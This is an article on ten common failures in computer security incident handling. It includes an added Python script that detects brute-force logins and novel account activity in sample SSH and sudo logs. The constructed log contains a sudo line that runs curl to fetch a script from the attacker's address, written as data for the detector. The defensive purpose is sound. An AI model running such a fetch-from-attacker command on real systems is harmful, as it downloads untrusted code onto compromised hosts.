Ten Deadly Sins in Incident Handling
August 2010

Ten Deadly Sins of Incident Handling

A secured environment is crucial for business continuity. However, incidents are bound to happen. Appropriate incident handling processes help prevent security threats and ensure their timely identification and mitigation. This article delves into the ten deadly sins of incident handling.

1. Introduction

Risks are inherent to the Internet environment. The security threat profile of cyberspace in general has increased over the past several years. Threats have become more sophisticated, frequent and damaging, and cybercrime has become a key component of organized crime. Cybercriminals take advantage of system and network vulnerabilities by probing, intruding and attacking to damage, alter or steal information. The chaos caused by cyber-attacks includes denial of service, unauthorized intrusions, viruses, Trojan attacks and malicious mail.

Organizations do take preventive measures such as proper authorization and encryption mechanisms, regular updates, anti-virus solutions and user awareness. Of course, it is not possible to prevent all security incidents: hackers manage to find vulnerabilities in security products and in the network infrastructure. Therefore the "response," better known as "incident handling," plays a major role in network defense.

1.1 Incident Handling

Any unusual activity in a system or network may be cause for alarm. For example, an employee may find an anomaly in the functioning of an application, or an intrusion detection tool may indicate suspicious activity in the network. These unusual activities are better known as "events," and they are the kind of events that may lead to a security incident. Incidents are interruptions caused by adverse events which result in a violation of standard security policies.
Adverse events such as unauthorized access, system crashes, malicious code execution, denial of service and unauthorized use of resources may change the normal functioning of computer systems and/or the network. An incident[1] in the form of a virus attack, unauthorized access or an illegal activity by an insider requires a specific, "appropriate" response. Incident handling refers to the set of procedures, measures and actions initiated to detect, analyze and respond to an incident, and to prevent and limit further damage. Incident response should be an integral part of any organization's information security policy. The incident handling process involves preparation, detection, analysis, containment, recovery and post-incident analysis. An organization may have a single incident handling and response team or several.

[1] The word "incident" used in this paper refers to computer security incidents.

© Copyright EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

2. Ten deadly sins in incident handling

Incident response makes the difference between recovery and disaster. Here are the ten deadly sins in incident handling:

i. Failure to identify/detect an incident

As discussed earlier, adverse events may lead to an incident. However, hackers change their modus operandi from time to time to bypass detection. Intrusion detection tools may not detect all anomalies in systems and networks[2]. If the anti-virus software is not updated regularly, it may not detect a new form of virus that has breached the system. A user may ignore a suspicious activity. Sometimes intrusion detection tools raise false positives[3]: for instance, a few minutes of high CPU utilization or a misconfigured system may trigger an alarm when there is no threat.

The reasons cited above are only a few of those that make incident detection one of the most challenging tasks the response team must address. An incident handling team should nevertheless be able to outline procedures to identify common or recurring incidents. Detection determines the response: failure to detect an incident increases the exposure of systems and networks and leads to grave cost implications. An incident handling team can examine potential threat indicators such as virus detections, multiple failed login attempts, slow Internet connectivity and poor system performance to detect possible incidents. Threat indicators can also be used to connect different, seemingly unrelated events. For example, new files with unusual names may indicate an attempt to gain unauthorized access to the victim machine, and unusual messages or graphics on a computer screen may indicate a malicious code attack. The incident handling team should use announcements of new vulnerabilities or new forms of attack to examine their own systems and networks and confirm that they can withstand these new threats.

[2] Failure to detect an actual attack is termed a false negative.
[3] False positives are events where an alarm is raised even though there is no threat.

ii. Lack of incident prioritization

Security incidents differ in severity, so it is important to prioritize them for better management of the incident handling process and timely restoration of business operations. Prioritization allows a particular incident to be assigned to the correct response team. Incidents may also affect the business's service level agreements: non-availability of a service to customers beyond the period their contract allows could attract penalties. Lack of prioritization may lead to improper reporting of the incident or delay in remedial measures and restoration.

Prioritization of incidents could be based on:
a. The criticality of the targeted resource
b. Impact of the incident on current business operations
c. Potential long-term impact on business operations
d. Possible leakage of privileged or confidential business data
e. Urgency of resolution
f. Possible breach of service level agreements
g. Impact on business reputation
h. Resources required to fix the vulnerabilities
i. Cost of non-resolution to the business, including loss of revenue

Incident prioritization helps in better reporting, timely action, appropriate resource allocation and the protection of evidence. It also helps in the timely reporting of an incident to the appropriate internal and external authorities.

iii. Miscommunication

It is important to communicate an incident or security breach to the various internal and external stakeholders. However, it is equally crucial to have a proper communication policy to avoid miscommunication. Communication to internal and external parties depends on the severity of the incident and its impact on business operations. Announcing an attack to all employees may alert an intruder who is an insider and prompt them to destroy evidence. Confronting a person you suspect of causing the incident may also tip off their accomplices, and the "trail of events" that could have supported legal action against the intruder is lost. The first objective of the incident handling team must be to control the incident. Listed below are some precautions incident handling personnel need to take when communicating an incident to other parties:
a. Identify the different stakeholders to be notified: management, law enforcement authorities, customers, media, the general public, the IT department, the human resources manager and security experts.
b. Take the advice of legal counsel before notifying law enforcement authorities.
c. Communicate with the media through the public relations officer.
d. Alert customers only if the threat is substantial. It is crucial to avoid panic among customers, which could hamper the incident handling process.

iv. Failure to isolate the infected device/system

One of the important decisions faced by the incident response team is whether to keep an infected system in operation or to isolate it from the network. In some cases an organization may continue to use the infected machine to ensure operational continuity. However, an infected system may affect other systems in the network and may even serve as a vector for launching attacks on them. It is therefore important to isolate the infected system from the network to protect the rest of the network from the virus or malicious code. Isolating the host at the network level (blocking it at the switch or firewall) is preferable to powering it off, since a power-off destroys volatile evidence such as memory contents and active connections that the team will need for analysis. To ensure business continuity it is advisable to keep redundant backups of critical systems so that service continues uninterrupted if the primary system is affected.

v. Inappropriate log analysis

Reviewing log files is one of the ways to detect the transmission of malicious code. However, a common mistake made by incident handling teams is to look only for those log lines the organization has already deemed suspicious. Some log analysis tools filter only predefined attack signatures and events from the logs. Searching only for predefined events will not detect novel forms of attack or malicious behavior. Logs should also be taken from a central log server where one exists, not only from the compromised host, since an intruder with access to the host can delete or alter the local copies. Log mining is another way to recognize incidents and can be a key factor in detecting patterns of events.
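The following script is an added example, not code from the EC-Council paper, showing what the two approaches above look like side by side: a signature rule for the "multiple failed login attempts" indicator from sin i, and a baseline rule for sin v that reports any activity outside a profile learned from earlier logs, so that events with no predefined signature still surface. It then connects the two, as sin i recommends, by raising the priority of a successful login from a source that was just guessing passwords. The log lines are constructed, and the OpenSSH/sudo message formats, the fixed log year and the thresholds are this example's assumptions.

```python
"""Signature-based and baseline-based detection over auth log lines.

Added illustration, not the EC-Council paper's code. The log lines are constructed;
the OpenSSH/sudo message formats, the log year and the thresholds are assumptions.
"""
from __future__ import annotations
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOG_YEAR = 2010                      # assumption: syslog timestamps carry no year
REVIEW_START = datetime(2010, 8, 3)  # events before this form the baseline profile

# Constructed sample log (not captured from a real system): a normal day, then a
# password-guessing burst, a login from the guessing host, and a sudo by that user.
SAMPLE_LOG = """\
Aug 02 09:00:01 web01 sshd[2001]: Accepted publickey for deploy from 10.0.0.5 port 50211 ssh2
Aug 02 09:05:13 web01 sshd[2010]: Accepted password for alice from 10.0.0.7 port 50300 ssh2
Aug 02 10:00:02 web01 sshd[2100]: Accepted publickey for deploy from 10.0.0.5 port 50400 ssh2
Aug 03 02:14:01 web01 sshd[3001]: Failed password for root from 203.0.113.9 port 41001 ssh2
Aug 03 02:14:03 web01 sshd[3002]: Failed password for root from 203.0.113.9 port 41002 ssh2
Aug 03 02:14:05 web01 sshd[3003]: Failed password for invalid user admin from 203.0.113.9 port 41003 ssh2
Aug 03 02:14:07 web01 sshd[3004]: Failed password for invalid user admin from 203.0.113.9 port 41004 ssh2
Aug 03 02:14:09 web01 sshd[3005]: Failed password for alice from 203.0.113.9 port 41005 ssh2
Aug 03 02:14:30 web01 sshd[3006]: Accepted password for alice from 203.0.113.9 port 41006 ssh2
Aug 03 02:15:02 web01 sudo[3010]: alice : TTY=pts/1 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/curl http://203.0.113.9/x.sh
Aug 03 08:00:11 web01 sshd[3100]: Failed password for alice from 10.0.0.7 port 50500 ssh2
Aug 03 08:00:40 web01 sshd[3101]: Accepted password for alice from 10.0.0.7 port 50501 ssh2
"""

LINE_RE = re.compile(r"^(?P<ts>\w{3} \d{2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
                     r"(?P<prog>[\w-]+)\[\d+\]: (?P<msg>.*)$")
SSH_RE = re.compile(r"^(?P<result>Accepted|Failed) \S+ for (?:invalid user )?"
                    r"(?P<user>\S+) from (?P<src>\S+)")
SUDO_RE = re.compile(r"^(?P<user>\S+) : .*USER=(?P<target>\S+) ; COMMAND=")


def parse_log(text: str) -> list[dict]:
    """Turn raw syslog lines into events; an unparseable line is skipped, not fatal."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ev = {"ts": datetime.strptime(f"{LOG_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S"),
              "host": m["host"], "prog": m["prog"], "msg": m["msg"],
              "user": None, "src": None, "result": None}
        if ev["prog"] == "sshd" and (s := SSH_RE.match(ev["msg"])):
            ev.update(user=s["user"], src=s["src"], result=s["result"])
        elif ev["prog"] == "sudo" and (s := SUDO_RE.match(ev["msg"])):
            ev.update(user=s["user"], result="sudo:" + s["target"])
        events.append(ev)
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Signature rule: `threshold` failed logins from one source inside `window`.
    A lone failure (a user mistyping a password) never reaches the threshold,
    which keeps this rule from raising a false positive on every typo."""
    recent, alerted, findings = defaultdict(deque), set(), []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["result"] != "Failed":
            continue
        q = recent[ev["src"]]
        q.append(ev["ts"])
        while ev["ts"] - q[0] > window:       # drop failures outside the window
            q.popleft()
        if len(q) >= threshold and ev["src"] not in alerted:
            alerted.add(ev["src"])            # one alert per source, not per line
            findings.append({"rule": "bruteforce", "ts": ev["ts"],
                             "src": ev["src"], "failures": len(q)})
    return findings


def detect_novel(events, baseline_before=REVIEW_START):
    """Baseline rule: learn which (user, program) and (user, login source) pairs
    occurred before `baseline_before`; anything outside that profile afterwards is
    reported once, whether or not a signature exists for it."""
    profile, findings = set(), []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["user"] is None or ev["result"] == "Failed":
            continue                          # failed attempts are the signature rule's job
        keys = [("prog", ev["user"], ev["prog"])]
        if ev["result"] == "Accepted":
            keys.append(("src", ev["user"], ev["src"]))
        for key in keys:
            novel = ev["ts"] >= baseline_before and key not in profile
            profile.add(key)
            if novel:
                findings.append({"rule": "novel_" + key[0], "ts": ev["ts"],
                                 "user": key[1], "value": key[2], "msg": ev["msg"]})
    return findings


def analyze(text: str, baseline_before=REVIEW_START) -> list[dict]:
    """Run both rules and connect their findings: a successful login from a source
    that was just brute-forcing the host outranks either finding on its own."""
    events = parse_log(text)
    findings = detect_bruteforce(events) + detect_novel(events, baseline_before)
    guessing = {f["src"] for f in findings if f["rule"] == "bruteforce"}
    for f in findings:
        if f["rule"] == "novel_src" and f["value"] in guessing:
            f["priority"] = "high"
            f["note"] = "login succeeded from a source that was brute-forcing this host"
        else:
            f["priority"] = "medium"
    return sorted(findings, key=lambda f: f["ts"])


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f["ts"], f["priority"].upper(), f["rule"], f.get("note", f.get("msg", "")))
```

Run as is, the script reports three findings: the password-guessing burst from 203.0.113.9, the first ever login for alice from that address (raised to high priority because the same address triggered the brute-force rule), and alice's first use of sudo. The single failed login from alice's usual address at 08:00 produces nothing, which is the point of the threshold. The novelty rule is deliberately simple; in practice the baseline should be built from a period the team has already reviewed, or it will quietly learn the intruder's behaviour as normal.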
Log mining also facilitates segmentation for easier identification: an incident team member can, for example, segment the logs by user, by search and browsing history, and by user browsing patterns.

vi. Restoration of operations without eradicating the vulnerability

Incident identification and eradication are important functions of an incident handling team. However, an organization in a hurry to restore business operations may choose to restore the affected system without eradicating the cause of the incident. This practice increases the chance that the incident will recur. Before restoring operations, it is therefore important to control the damage caused by the attack. The attack that took place can be discovered by identifying the cause and symptoms of the incident, and any vulnerability that a malicious hacker could exploit must be examined and removed. For example, if the incident team encounters an incident in which user-level access was compromised by a brute force attack, it is important that they:
a. change the user's password,
b. educate the user about stronger passwords,
c. encourage stronger password usage among all users,
d. review or update the password policy in accordance with industry accepted standards,
e. check for contaminated files in the user's account,
f. find the vulnerabilities that allowed the attack, and
g. update the anti-virus system.

For a brute force attack, the vulnerability to remove is usually the absence of any limit on repeated failed logins, so an account lockout or rate-limiting control belongs on this list as well. It is also important to identify the loopholes in the security infrastructure and strengthen the defenses in accordance with the latest security updates. A clean backup can help in restoring the system. The incident team may also decide to rebuild a fresh system by installing new hardware and software. It is important to secure the restored system to curtail further attacks.

vii. Inadequate training and lack of skilled and certified personnel

Threats in cyberspace have become more complicated. Hackers can exploit vulnerabilities in network security devices and software, and they can also exploit users' actions. Essentially, hackers have a multitude of attack vectors, attack types and vulnerabilities to choose from. Lack of adequate skills and technical expertise may result in mishandling of the incident, loss of evidence, an inappropriate response and further complications. Personnel within the incident handling team must be able to recognize intrusion techniques and the different forms of attack. They must be able to detect and analyze intrusions and must know the network devices, operating systems and applications in use. The incident handling team must have personnel skilled in varied domains such as:
a. Network and system security
b. Software engineering
c. Programming
d. Scripting languages
e. Forensics
f. Vulnerability assessment
g. Penetration testing

The incident handling team must also know the various tools and techniques used in vulnerability assessments, and should keep up to date with the latest events in information security, including new vulnerabilities discovered by other incident response teams. Excellent communication, problem-solving and time management skills are mandatory for incident handling personnel. Regular training sessions, e-learning programs and workshops may be required to supplement the skills of the team members.

viii. Not reviewing or validating the incident response

The incident response process includes the steps necessary to restore normal operations after an adverse event or incident. Once the incident is contained, the affected systems should be recovered. It is then important to review the entire incident response process. The review should assess:
a. The incident response plan: whether preparation was adequate.
b. Whether the steps taken by the team were in accordance with the plan, and whether any flexibility was required.
c. Successful and failed steps, and success in containing the incident.
d. Promptness of the response and causes of delay.
e. Whether appropriate communication was made and stakeholders were notified.
f. Challenges faced.
g. Resources used, and whether additional resources were needed.
h. Level of management support.
i. Areas for improvement (skills, training requirements, procedures).

Documentation is crucial at all phases of the incident handling and response process. Team members must document all activities, evidence collected, vulnerabilities and responses during preparation, detection, analysis, containment, recovery and post-incident analysis. A thorough review of the incident response is recommended to prevent repeated errors and to improve preparedness. Reviews also enable the development of appropriate response procedures. Lessons learned from the incident handling and response process help to devise better plans and procedures and to incorporate new tools and techniques.

ix. Lack of proper coordination with other stakeholders

Appropriate coordination between the various stakeholders and the incident handling team is crucial to a successful incident response. Lack of coordination may result in chaos, duplication of tasks and delay in the incident response process. The stakeholders include users, system administrators, network operations, information security officers, the chief information officer, other incident response teams, human resources, the public relations officer, the legal department and law enforcement agencies.
Proper coordination between the incident response team and the public relations officer is crucial for appropriate and timely communication of an adverse event to the media and/or customers. Cooperation with the human resources department is also crucial to ensure timely action against an internal intruder. Some incidents may require escalation to higher authorities such as the Chief Information Officer or the Chief Information Security Officer for timely action.

x. Lack of documentation and implementation of standard incident handling and response procedures

Incident handling and response is a planned process that requires incident detection, analysis, eradication and recovery within stipulated deadlines. It is therefore important to have a standard set of procedures that facilitates timely intervention to control any adverse event. A standard operating procedure should:
a. Define an incident and indicate common incidents related to systems, the network, user accounts, and files and folders.
b. Suggest procedures for reporting an incident and give the contact details of the appropriate authorities.
c. Define the roles and responsibilities of users, system administrators, the information security officer and incident response teams.
d. Give the contact details of incident response teams, management, vendors, suppliers, law enforcement authorities, the legal team, the human resources team and other requisite teams.
e. Have procedures to categorize incidents in terms of their severity, business impact and violation of law.
f. Indicate procedures for incident escalation and notification. Instances of criminal activity and likely breaches of service level agreements may require escalation to higher authorities.
g. Indicate precautions for handling and protecting evidence.
h. Indicate precautions in dealing with data, systems, applications and the network to prevent or minimize incidents.
i. Prescribe checklists for dealing with commonly known cyber threats and incidents.

3. Conclusion

Incident handling is crucial to prevent, detect and mitigate cyber threats in an organization. Proper procedures must be in place for timely detection and resolution of an incident. An appropriate incident handling plan must devise effective mechanisms to prevent cyber threats. It is recommended that organizations incorporate incident handling as an integral part of their information security policy to ensure minimum disruption to business activities.